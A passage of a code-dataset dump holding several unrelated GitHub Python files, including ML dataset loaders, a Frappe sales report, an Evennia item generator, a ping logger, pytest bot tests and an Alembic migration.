y_test = x[split_size:], y[split_size:]\n\n # image-like representation for compatibility with old code\n n_channels = 1\n n_coords = 2\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], n_channels, n_coords, 1)\n x_test = x_test.reshape(x_test.shape[0], n_channels, n_coords, 1)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], 1, n_coords, n_channels)\n x_test = x_test.reshape(x_test.shape[0], 1, n_coords, n_channels)\n input_shape = x_train.shape[1:]\n\n # binary one hot encoding\n num_classes = 2\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\n\ndef load_fashion_mnist(channels, img_rows=28, img_cols=28):\n print(\"\\nLoading fashion mnist.\")\n\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = keras.utils.to_categorical(y_test, 10)\n\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n \n input_shape = x_train.shape[1:]\n num_classes = 10\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\n\ndef load_mnist(channels, img_rows=28, img_cols=28):\n\n print(\"\\nLoading mnist.\")\n\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = keras.utils.to_categorical(y_test, 10)\n\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n \n input_shape = x_train.shape[1:]\n num_classes = 10\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef labels_to_onehot(integer_labels, n_classes=None):\n n_rows = len(integer_labels)\n n_cols = n_classes if n_classes else integer_labels.max() + 1 \n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\n onehot[np.arange(n_rows), integer_labels] = 1\n return onehot\n\ndef onehot_to_labels(y):\n if type(y) is np.ndarray:\n return np.argmax(y, axis=1)\n elif type(y) is torch.Tensor:\n return torch.max(y, 1)[1]\n\n# def load_cifar(channels, img_rows=32, img_cols=32):\n# x_train = None\n# y_train = []\n\n# data_dir=\"../../cifar-10/\"\n\n# for batch in range(1, 6):\n# data_dic = unpickle(data_dir + \"data_batch_{}\".format(batch))\n# if batch == 1:\n# x_train = data_dic['data']\n# else:\n# x_train = np.vstack((x_train, data_dic['data']))\n# y_train += data_dic['labels']\n\n# test_data_dic = unpickle(data_dir + \"test_batch\")\n# x_test = test_data_dic['data']\n# y_test = test_data_dic['labels']\n\n# x_train = x_train.reshape((len(x_train), 3, img_rows, img_cols))\n# x_train = np.rollaxis(x_train, 1, 4)\n# y_train = np.array(y_train)\n\n# x_test = x_test.reshape((len(x_test), 3, img_rows, img_cols))\n# x_test = np.rollaxis(x_test, 1, 
4)\n# y_test = np.array(y_test)\n\n# input_shape = x_train.shape[1:]\n\n# x_train = x_train.astype('float32')\n# x_test = x_test.astype('float32')\n# x_train /= 255\n# x_test /= 255\n\n# if channels == \"first\":\n# x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)\n# x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)\n\n# elif channels == \"last\":\n# x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)\n# x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)\n\n# y_train = keras.utils.to_categorical(y_train, 10)\n# y_test = keras.utils.to_categorical(y_test, 10)\n\n# input_shape = x_train.shape[1:]\n# num_classes = 10\n# return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef load_dataset(dataset_name, n_inputs=None, channels=\"first\", shuffle=False):\n\n if dataset_name == \"mnist\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_mnist(channels)\n # elif dataset_name == \"cifar\":\n # x_train, y_train, x_test, y_test, input_shape, num_classes = load_cifar(channels)\n elif dataset_name == \"fashion_mnist\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_fashion_mnist(channels)\n elif dataset_name == \"half_moons\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_half_moons()\n else:\n raise AssertionError(\"\\nDataset not available.\")\n\n x_train, y_train = torch.from_numpy(x_train), torch.from_numpy(y_train)\n x_test, y_test = torch.from_numpy(x_test), torch.from_numpy(y_test)\n\n if n_inputs:\n x_train, y_train, _ = balanced_subset(x_train, y_train, num_classes, n_inputs)\n x_test, y_test, _ = balanced_subset(x_test, y_test, num_classes, n_inputs)\n\n print('x_train shape =', x_train.shape, '\\nx_test shape =', x_test.shape)\n print('y_train shape =', y_train.shape, '\\ny_test shape =', y_test.shape)\n\n if shuffle is True:\n idxs = np.random.permutation(len(x_train))\n x_train, y_train = (x_train[idxs], y_train[idxs])\n idxs = np.random.permutation(len(x_test))\n x_test, y_test = (x_test[idxs], y_test[idxs])\n\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef balanced_subset(inputs, labels, num_classes, subset_size):\n\n n_samples = min(subset_size, len(inputs))\n samples_per_class = int(n_samples/num_classes)\n\n sampled_idxs = []\n for target in range(num_classes+1):\n\n while len(sampled_idxs) < target*samples_per_class:\n idx = np.random.randint(0, len(inputs))\n\n if labels[idx].argmax(-1)==(target-1):\n sampled_idxs.append(idx)\n\n return inputs[sampled_idxs], labels[sampled_idxs], sampled_idxs\n\n############\n# pickling #\n############\n\n\ndef save_to_pickle(data, path, filename):\n\n full_path=os.path.join(path, filename+\".pkl\")\n print(\"\\nSaving pickle: \", full_path)\n # os.makedirs(os.path.dirname(path), exist_ok=True)\n os.makedirs(path, exist_ok=True)\n with open(full_path, 'wb') as f:\n pkl.dump(data, f)\n\ndef load_from_pickle(path, filename):\n\n full_path=os.path.join(path, filename+\".pkl\")\n print(\"\\nLoading from pickle: \", full_path)\n with open(full_path, 'rb') as f:\n u = pkl._Unpickler(f)\n u.encoding = 'latin1'\n data = u.load()\n\n return data\n \ndef unpickle(file):\n \"\"\" Load byte data from file\"\"\"\n with open(file, 'rb') as f:\n data = pkl.load(f, encoding='latin-1')\n return data\n\ndef plot_loss_accuracy(dict, path):\n fig, (ax1, ax2) = plt.subplots(2, figsize=(12,8))\n ax1.plot(dict['loss'])\n ax1.set_title(\"loss\")\n ax2.plot(dict['accuracy'])\n ax2.set_title(\"accuracy\")\n 
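A round trip through the one-hot helpers defined earlier in this module (labels_to_onehot and onehot_to_labels), assuming both are in scope:

import numpy as np

labels = np.array([0, 2, 1])
onehot = labels_to_onehot(labels, n_classes=3)
assert onehot.shape == (3, 3)
assert (onehot_to_labels(onehot) == labels).all()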
os.makedirs(os.path.dirname(path), exist_ok=True)\n fig.savefig(path)","repo_name":"ginevracoal/BayesianRelevance","sub_path":"src/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"14055294229","text":"import frappe\nfrom frappe import _\n\n\ndef execute(filters=None):\n return get_columns(filters), get_data(filters)\n\n\ndef get_data(filters):\n\n conditions = get_conditions(filters)\n data = frappe.db.sql(\n \"\"\"\n\t\tselect\n\t\t\ttso.name, tso.customer_name , tso.customer_group , tcic.model, tsoi.item_name , tso.transaction_date , \n\t\t\ttsoi.delivery_date , tso.branch_cf , tu.full_name \n\t\tfrom `tabSales Order` tso \n\t\tleft outer join `tabCar Information CT` tcic on tcic.parent = tso.name \n\t\tinner join `tabSales Order Item` tsoi on tsoi.parent = tso.name \n\t\tinner join tabUser tu on tu.name = tso.owner \n\t\t\t\t{conditions}\n\t\torder by tso.name, tsoi.delivery_date\n \"\"\".format(conditions=conditions), filters)\n\n return data\n\n\ndef get_columns(filters):\n columns = [\n {\n \"label\": _(\"Sales order\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"name\",\n \"options\": \"Sales Order\",\n \"width\": 200\n },\n {\n \"label\": _(\"Customer\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"customer_name\",\n \"options\": \"Customer\",\n \"width\": 220\n },\n {\n \"label\": _(\"Customer Group\"),\n \"fieldname\": \"customer_group\",\n \"width\": 220\n },\n {\n \"label\": _(\"Model\"),\n \"fieldname\": \"model\",\n \"width\": 220\n },\n {\n \"label\": _(\"Item Name\"),\n \"fieldname\": \"item_name\",\n \"width\": 220\n },\n {\n \"label\": _(\"Transaction Date\"),\n \"fieldtype\": \"Date\",\n \"fieldname\": \"transaction_date\",\n \"width\": 140\n },\n {\n \"label\": _(\"Delivery Date\"),\n \"fieldtype\": \"Date\",\n \"fieldname\": \"delivery_date\",\n \"width\": 120\n },\n {\n \"label\": _(\"Branch\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"branch_cf\",\n \"options\": \"Branch\",\n \"width\": 150\n },\n {\n \"label\": _(\"Created By\"),\n \"fieldname\": \"owner\",\n \"width\": 120\n },\n ]\n\n return columns\n\n\ndef get_conditions(filters):\n conditions = []\n\n if filters.from_date:\n conditions.append(\"tso.delivery_date >= %(from_date)s\")\n if filters.to_date:\n conditions.append(\"tso.delivery_date <= %(to_date)s\")\n\n if filters.branch:\n conditions.append(\"tso.branch_cf <= %(branch)s\")\n if filters.owner:\n conditions.append(\"tso.owner = %(owner)s\")\n\n return conditions and \" where \" + \" and \".join(conditions) or \"\"\n","repo_name":"ashish-greycube/armor","sub_path":"armor/armor/report/armor_booking/armor_booking.py","file_name":"armor_booking.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31582188291","text":"from evennia import create_object, DefaultObject\nimport evennia.contrib.clothing\nfrom evennia import default_cmds\nimport random\nimport markovify\nfrom django.conf import settings\n\n\n\nclass Item(DefaultObject):\n \n def getSubstance(self):\n substanceFO = open(\"typeclasses/itemator/word_lists/substances.txt\")\n substanceList = list(substanceFO)\n selection = random.randint(0, len(substanceList) - 1)\n substance = substanceList[selection]\n substance = substance.rstrip(\"\\n\")\n return substance\n\n def getAdjective(self):\n adjectiveFO = 
open(\"typeclasses/itemator/word_lists/adjectives.txt\")\n adjectiveList = list(adjectiveFO)\n selection = random.randint(0, len(adjectiveList) - 1)\n adjective = adjectiveList[selection]\n adjective = adjective.rstrip(\"\\n\")\n return adjective\n\n def getColor(self):\n colorsFO = open(\"typeclasses/itemator/word_lists/colors.txt\")\n colorsList = list(colorsFO)\n colorsSelection = random.randint(0, len(colorsList) - 1)\n color = colorsList[colorsSelection]\n color = color.rstrip(\"\\n\")\n colorsFO.close()\n return color\n\n def getSkill(self):\n skillsFO = open(\"typeclasses/itemator/word_lists/skills.txt\")\n skillsList = list(skillsFO)\n selection = random.randint(0, len(skillsList) - 1)\n skill = skillsList[selection]\n skill = skill.rstrip(\"\\n\")\n return skill\n \n def getArtwork(self):\n artworksFO = open(\"typeclasses/itemator/word_lists/artworks.txt\")\n artworksList = list(artworksFO)\n selection = random.randint(0, len(artworksList) - 1)\n artwork = artworksList[selection]\n artwork = artwork.rstrip(\"\\n\")\n return artwork\n\n def getTheme(self):\n themesFO = open(\"typeclasses/itemator/word_lists/epicThemes.txt\")\n themesList = list(themesFO)\n themesSelection = random.randint(0, len(themesList) - 1)\n theme = themesList[themesSelection]\n theme = theme.rstrip(\"\\n\")\n themesFO.close()\n return theme\n\n def getVerb(self):\n verbsFO = open(\"typeclasses/itemator/word_lists/artSpeakVerbs.txt\")\n verbsList = list(verbsFO)\n verbsSelection = random.randint(0, len(verbsList) - 1)\n verb = verbsList[verbsSelection]\n verb = verb.rstrip(\"\\n\")\n verbsFO.close()\n return verb\n \n def getTitle(self):\n titlesFO = open(\"typeclasses/itemator/word_lists/artTitles.txt\")\n titlesList = list(titlesFO)\n titlesSelection = random.randint(0, len(titlesList) - 1)\n title = titlesList[titlesSelection]\n title = title.rstrip(\"\\n\")\n title = title.title()\n titlesFO.close()\n return title\n \n def getTitleTwo(self):\n titlesTwoFO = open(\"typeclasses/itemator/word_lists/artTitles2.txt\")\n titlesTwoList = list(titlesTwoFO)\n titlesTwoSelection = random.randint(0, len(titlesTwoList) - 1)\n titleTwo = titlesTwoList[titlesTwoSelection]\n titleTwo = titleTwo.rstrip(\"\\n\")\n titleTwo = titleTwo.title()\n titlesTwoFO.close()\n return titleTwo\n\n def getTalismanName(self):\n talismanFO = open(\"typeclasses/itemator/word_lists/talismans.txt\")\n talismanList = list(talismanFO)\n selection = random.randint(0, len(talismanList) - 1)\n talisman = talismanList[selection]\n talisman = talisman.rstrip(\"\\n\")\n talismanFO.close()\n return talisman\n\n def getSciFiAdjective(self):\n SciFiAdjectiveFO = open(\"typeclasses/itemator/word_lists/scifiwords.txt\")\n SciFiAdjectiveList = list(SciFiAdjectiveFO)\n selection = random.randint(0, len(SciFiAdjectiveList) - 1)\n SciFiAdjective = SciFiAdjectiveList[selection]\n SciFiAdjective = SciFiAdjective.rstrip(\"\\n\")\n SciFiAdjectiveFO.close()\n return SciFiAdjective\n\n def addAorAn(self, word):\n try:\n if word[-1] != \"s\" and word[0] == \"a\" or word[0] == \"e\" or word[0] == \"i\" or word[0] == \"o\" or word[0] == \"u\":\n word = \"An \" + word\n elif word[-1] != \"s\":\n word = \"A \" + word\n except IndexError:\n word = \"One \" + word\n return word\n\n def generateItem(self):\n \n itemType = random.randint(0, 7)\n if itemType <= 2:\n self.item_proto = self.generateTalisman()\n elif itemType == 3:\n self.item_proto = self.generateArt()\n elif itemType == 4:\n self.item_proto = self.generateSciFiBook()\n elif itemType == 5:\n self.item_proto 
= self.generatePoem()\n else:\n self.item_proto = self.generateGarment()\n\n return self.item_proto\n\n\n \n def generateGarment(self):\n clothesFO = open(\"typeclasses/itemator/word_lists/clothes.txt\")\n clothesList = list(clothesFO)\n color = self.getColor()\n clothesSelection = random.randint(0, len(clothesList) - 1)\n clothingItem = clothesList[clothesSelection]\n clothingItem = clothingItem.rstrip(\"\\n\")\n self.item_name = clothingItem\n clothingDescription = self.addAorAn(color) + \" \" + clothingItem\n self.item_description = clothingDescription\n clothesFO.close()\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"evennia.contrib.clothing.Clothing\",\n \"desc\": self.item_description,\n }\n return self.item_proto\n\n def getTextColor(self):\n r = random.randint(0, 5)\n g = random.randint(0, 5)\n b = random.randint(0, 5)\n textcolor = \"|\" + str(r) + str(g) + str(b)\n return textcolor\n\n def generateTalisman(self):\n color = self.getColor()\n substance = self.getSubstance()\n adjective = self.getAdjective()\n name = self.getTalismanName()\n self.item_name = name\n anAdjective = self.addAorAn(adjective)\n self.item_description = anAdjective + \" \" + \\\n name + \" made of \" + color + \" \" + substance + \".\"\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n }\n return self.item_proto\n\n def generateArt(self):\n roll = random.randint(0, 20)\n color = self.getColor()\n substance = self.getSubstance()\n adjective = self.getAdjective()\n artwork = self.getArtwork()\n title = self.getTitle()\n titleTwo = self.getTitleTwo()\n skill = self.getSkill()\n key = title + \" \" + titleTwo\n textcolor = self.getTextColor()\n verb = self.getVerb()\n theme = self.getTheme()\n anAdjective = self.addAorAn(adjective)\n self.item_key = key\n if roll <= 10:\n self.item_description = textcolor + \"'\" + key + \"'|n\" + \": \\n\" + anAdjective + \" piece of \" + artwork + \" created from \" + color + \" \" + substance + \". \" + \"It's a masterful work of \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n }\n if roll >= 19:\n self.item_description = \"|500\" + \"'\" + key + \"'|n\" + \": \\n |401 An unspeakable anathema |n \" + artwork + \" forged in \" + color + \" \" + substance + \". \" + \"It embodies profane \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n \"cursed\": \"true\",\n }\n else:\n self.item_description = textcolor + \"'\" + key + \"'|n\" + \": \\n\" + anAdjective + \" example of \" + artwork + \" rendered in \" + color + \" \" + substance + \". 
\" + title + \" \" + titleTwo + \" displays considerable \" + skill + \" as it \" + verb + \" \" + theme + \".\"\n self.item_proto = {\n \"key\": self.item_key,\n \"typeclass\": \"typeclasses.objects.Object\",\n \"desc\": self.item_description,\n \"artwork\": \"true\",\n }\n return self.item_proto\n\n def generateSciFiBook(self):\n adjective = self.getSciFiAdjective()\n book_name = self.getTalismanName()\n color = self.getColor()\n bookCorpusFO = open(\"typeclasses/itemator/word_lists/scifi_book_corpus.txt\")\n text = bookCorpusFO.read()\n text_model = markovify.NewlineText(text)\n textcolor = self.getTextColor()\n self.item_name = color + \" book\"\n self.bookDescription = \"A book of science fiction. You can |555read|n it if you like.\"\n book_text = \"The \" + adjective + \" \" + book_name \n book_text = \"\\n\" + textcolor + book_text.title() + \"|n\" + \"\\n\\n\"\n for i in range(60):\n try:\n book_text += text_model.make_sentence(tries=100) + \"\\n\"\n except TypeError:\n book_text += \"ROCKETS! ROCKETS! ROCKETS!\"\n bookCorpusFO.close()\n self.readable_text = book_text\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Readable\",\n \"desc\": self.bookDescription,\n \"readable_text\": self.readable_text,\n }\n return self.item_proto\n\n def generatePoem(self):\n poem_name =\"A poem\"\n poetryCorpusFO = open(\n \"typeclasses/itemator/word_lists/poetry_corpus.txt\")\n text = poetryCorpusFO.read()\n text_model = markovify.NewlineText(text)\n text_model = text_model.compile()\n thing = self.getTitleTwo()\n textcolor = self.getTextColor()\n self.poemDescription = \"A chapbook of poetry. You can |555read|n it if you like.\"\n poem_name = text_model.make_short_sentence(30)\n try:\n poem_name = poem_name.title()\n except:\n poem_name = poem_name\n poem_text = \"\\n\" + textcolor + poem_name + \"|n\\n\"\n for i in range(5):\n roll = random.randint(0, 5)\n try:\n if roll == 0:\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(120) + \"\\n\"\n elif roll == 2:\n poem_text += \"\\t\" + poem_name +\" \"+ text_model.make_sentence(tries=100) + \"\\n\\n\"\n elif roll == 3:\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(80) + \", the \" + thing + \".\\n\"\n elif roll == 4:\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n poem_text += text_model.make_sentence(tries=100) + \"\\n\"\n else:\n poem_text += \"\\t\\t\" + text_model.make_short_sentence(120) + \"\\n\"\n except TypeError:\n poem_text += \"\\n\"\n roll = random.randint(0, 3)\n if roll ==1:\n poem_text += \"\\n\\t\\t\"\n poem_text += textcolor + text_model.make_sentence(tries=100) + \" \" + poem_name +\".|n\"\n poetryCorpusFO.close()\n self.item_name = poem_name\n self.readable_text = poem_text\n self.item_proto = {\n \"key\": self.item_name,\n \"typeclass\": \"typeclasses.objects.Readable\",\n \"desc\": self.poemDescription,\n \"readable_text\": self.readable_text,\n }\n return self.item_proto\n","repo_name":"wysiwyggins/Grotto","sub_path":"pre-django_scripts/itemator.py","file_name":"itemator.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"29270542291","text":"import os\nimport time\nimport os.path\n\n# Read hosts\nhosts = [x.replace(\"\\n\", \"\") for x in open(\"hosts.txt\", 
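# --- editorial sketch (not part of the original itemator file) ---
# Three notes on the itemator module above:
# 1) getAdjective, getSkill and getArtwork never close their file handles,
#    while the other pickers do. One helper with a context manager and
#    random.choice removes both the leak and the copy-paste; the path simply
#    mirrors the word_lists layout used above.
import random

def pick_word(path):
    # Read every line, strip the trailing newline, return a random entry.
    with open(path) as fo:
        return random.choice([line.rstrip("\n") for line in fo])

# e.g. adjective = pick_word("typeclasses/itemator/word_lists/adjectives.txt")
#
# 2) In addAorAn, `and` binds tighter than `or`, so the "ends with s" guard
#    only applies to words starting with "a"; a word ending in "s" that
#    starts with e/i/o/u still gets "An". The intended test is:
#    word[-1] != "s" and word[0] in "aeiou".
# 3) In generateArt, the second `if roll >= 19 ... else` pair also runs when
#    roll <= 10, so its else branch overwrites the masterpiece description;
#    the second test should be an `elif`.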
\"r\").readlines()]\n\ndef ping(host):\n # unix-like only\n res = os.popen(f\"ping {host} -c 1\").read()\n # parse response\n latency = res\\\n .split(\"\\n\")[-2]\\\n .split(\"= \")[1]\\\n .split(\" ms\")[0]\\\n .split(\"/\")[0]\n \n return (int(time.time()), float(latency))\n\nif not os.path.exists(\"out\"): os.makedirs(\"out\")\n\nfor host in hosts:\n res = ping(host)\n filepath = f\"out/{host}.csv\"\n exists = os.path.isfile(filepath)\n # Create file\n outfile = open(filepath, \"a\")\n # Check if output file exists\n if not exists:\n outfile.write(\"\\\"time\\\",\\\"ping\\\"\")\n outfile.write(f\"\\n{res[0]},{res[1]}\")\n ","repo_name":"CAG2Mark/server-ping-logger","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17692480894","text":"import sys\nimport os\nimport pytest\n\nsys.path.append(os.path.realpath(os.path.dirname(__file__) + \"/../..\"))\nsys.path.append(os.path.realpath(os.path.dirname(__file__) + \"/../../lib/intelligence/\"))\n\nfrom lib.gui_helper import GUIHelper\nfrom src.game import Game\nfrom src.bot import Bot\nfrom src.dice import Dice\nfrom intelligence_low import IntelligenceLow\nfrom intelligence_high import IntelligenceHigh\n\n\nclass TestBot:\n @pytest.mark.parametrize(\"bot\", [\n pytest.lazy_fixture('bot_low'),\n pytest.lazy_fixture('bot_high'),\n ])\n def test_get_ghelper(self, bot):\n assert(isinstance(bot.get_ghelper(), GUIHelper))\n\n @pytest.mark.parametrize(\"execution_number\", range(5))\n def test_roll_again_iq_low(self, bot_low, execution_number):\n decision = bot_low.roll_again(0, 0, 0, 0)\n assert type(decision) is bool\n\n @pytest.mark.parametrize(\n \"test_param\",\n [\n [0, 0, 0, 0, True], # beginning of the game\n [87, 91, 3, 3, True], # bot last roll\n [98, 81, 3, 3, True], # player last roll\n [37, 29, 18, 3, False], # optimal turn score\n [87, 79, 10, 5, True], # max turn roll score\n [37, 29, 26, 7, False], # finish turn\n [77, 87, 18, 3, False], # winning score\n ],\n )\n def test_roll_again_iq_high(self, bot_high, test_param):\n res = test_param.pop()\n assert bot_high.roll_again(*test_param) == res\n\n @pytest.mark.parametrize(\n \"bot, player_total\",\n [\n (pytest.lazy_fixture(\"bot_low\"), 0),\n (pytest.lazy_fixture(\"bot_high\"), 60),\n (pytest.lazy_fixture(\"bot_high\"), 90),\n (pytest.lazy_fixture(\"bot_high\"), 100),\n (pytest.lazy_fixture(\"bot_high\"), 105),\n ],\n )\n def test_play(self, bot, player_total, capsys):\n bot.play(Dice(), player_total, lambda x: x, 0)\n captured = capsys.readouterr().out # '5\\n2\\n6\\n'\n assert type(captured) is str\n elements = captured.split(\"\\n\")\n assert len(list(filter(lambda i: i not in range(1, 7), elements)))\n\n @pytest.fixture(scope=\"function\")\n def bot_low(self):\n return Bot(\"Computer\", IntelligenceLow(None), GUIHelper())\n\n @pytest.fixture(scope=\"function\")\n def bot_high(self):\n return Bot(\"Computer\", IntelligenceHigh(Game()), GUIHelper())\n","repo_name":"p33t00/py-game","sub_path":"tests/pytests/bot_test.py","file_name":"bot_test.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74910784159","text":"\"\"\"a\n\nRevision ID: 555cab92387a\nRevises: 25979ee1e026\nCreate Date: 2023-07-21 11:11:04.457534\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 
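# --- editorial sketch (not part of the original ping logger) ---
# The parser above recovers the min latency by chaining split() calls over
# the "rtt min/avg/max/mdev = a/b/c/d ms" summary line, which raises
# IndexError whenever the host is unreachable. A regex over the same assumed
# output format fails cleanly instead:
import re

def parse_min_latency(ping_output):
    m = re.search(r"=\s*([\d.]+)/", ping_output)
    return float(m.group(1)) if m else None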
'555cab92387a'\ndown_revision = '25979ee1e026'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('crypto_accounts', sa.Column('processes', sa.Integer(), nullable=False))\n op.add_column('tickets', sa.Column('dtime', sa.TIMESTAMP(), server_default=sa.text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), nullable=False))\n op.add_column('transactions', sa.Column('dtime', sa.TIMESTAMP(), server_default=sa.text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('transactions', 'dtime')\n op.drop_column('tickets', 'dtime')\n op.drop_column('crypto_accounts', 'processes')\n # ### end Alembic commands ###\n","repo_name":"twopercent051/forex_rus_bot","sub_path":"migrations/versions/555cab92387a_a.py","file_name":"555cab92387a_a.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71015875999","text":"from storeManage.data import Data\nfrom storeManage.extmem import Extmem\nfrom storeManage.algorithm import Algorithm\nextmem = Extmem()\nblkSize = 64\nbufSize = 520\nbuf = extmem.initBuffer(bufSize,blkSize)\nalgorithm = Algorithm()\n\ndef testWriteToDisk():\n blkIndex = buf.getNewBlock()\n addrs = []\n\n for i in range(buf.numAllBlock):\n addr = 'block_%d' %i\n # addr = int(addr)\n addrs.append(hash(addr).to_bytes(8,byteorder='little',signed=True))\n for addr in addrs:\n new_bytearray = bytearray(blkSize)\n data = b'abcdefg'\n new_bytearray[0:len(data)] = data[:]\n buf.insertBlock(new_bytearray,addr)\n _addr = int.from_bytes(addr,byteorder='little',signed=True)\n extmem.writeBlockToDisk(0,_addr,buf)\n print(str(buf))\n\ndef testInitData():\n data = Data()\n data.init_data()\n\ndef testReadFromDisk():\n extmem.readBlockFromDisk(1230600,buf)\n print(str(buf))\n\ndef testRelationSelect():\n # R.A = 40 -> 从 10000 开始存\n addrs = algorithm.relationSelect(algorithm.data.R, 1, 40, 10000)\n print(addrs)\n\ndef testRelationProjection():\n addrs = algorithm.relationProjection(algorithm.data.R, 1, 20000)\n print(addrs)\n\ndef testNestLoopJoin():\n # R.A == S.C\n addrs = algorithm.nest_loop_join(1, 1, 30000)\n print(addrs)\n\ndef testHashJoin():\n # R.A == S.C\n addrs = algorithm.hash_join(1, 1, 40000)\n print(addrs)\n\ndef testSortMergeJoin():\n # R.A == S.C\n addrs = algorithm.sort_merge_join(1, 1, 50000)\n print(addrs)\n\n# testInitData()\n# testWriteToDisk()\n# testReadFromDisk()\n\n# testRelationSelect()\n# testRelationProjection()\ntestNestLoopJoin()\ntestHashJoin()\ntestSortMergeJoin()\n","repo_name":"shuai-f/queryOptimization","sub_path":"storeManage/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12278554730","text":"#finding fibanocci series\ndef fib(n):\n \"Recursive function\"\n if n <= 1:\n return n\n else:\n return(fib(n-1) + fib(n-2))\n\n# take input from the user\nterms = int(input(\"How many terms? 
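# --- editorial sketch (not part of the original migration) ---
# The migration above repeats the same UTC server_default for two TIMESTAMP
# columns; a small factory keeps future add_column calls in sync:
import sqlalchemy as sa

def utc_dtime_column(name="dtime"):
    return sa.Column(name, sa.TIMESTAMP(),
                     server_default=sa.text("TIMEZONE('utc', CURRENT_TIMESTAMP)"),
                     nullable=False)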
\"))\n\n# check if the number of terms is valid\nif nterms <= 0:\n print(\"enter a positive integer\")\nelse:\n print(\"Fibonacci sequence:\")\n for i in range(terms):\n print(fib(i))","repo_name":"ruwaizrazak/learning","sub_path":"python/fibanocci.py","file_name":"fibanocci.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14111286659","text":"import logging\r\nimport time\r\nfrom datetime import datetime\r\nimport json\r\nimport random\r\nimport asyncio\r\nimport aiohttp\r\n\r\nimport nest_asyncio\r\nnest_asyncio.apply()\r\n\r\nlogging.basicConfig(\r\n level=logging.INFO,\r\n format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\r\n datefmt='%Y-%m-%d:%H:%M:%S'\r\n)\r\n\r\ndate_ = datetime.today().strftime('%Y-%m-%d')\r\nproxy_auth = aiohttp.BasicAuth('', '') # login, password\r\nproxy_token = ''\r\n\r\n\r\nclass 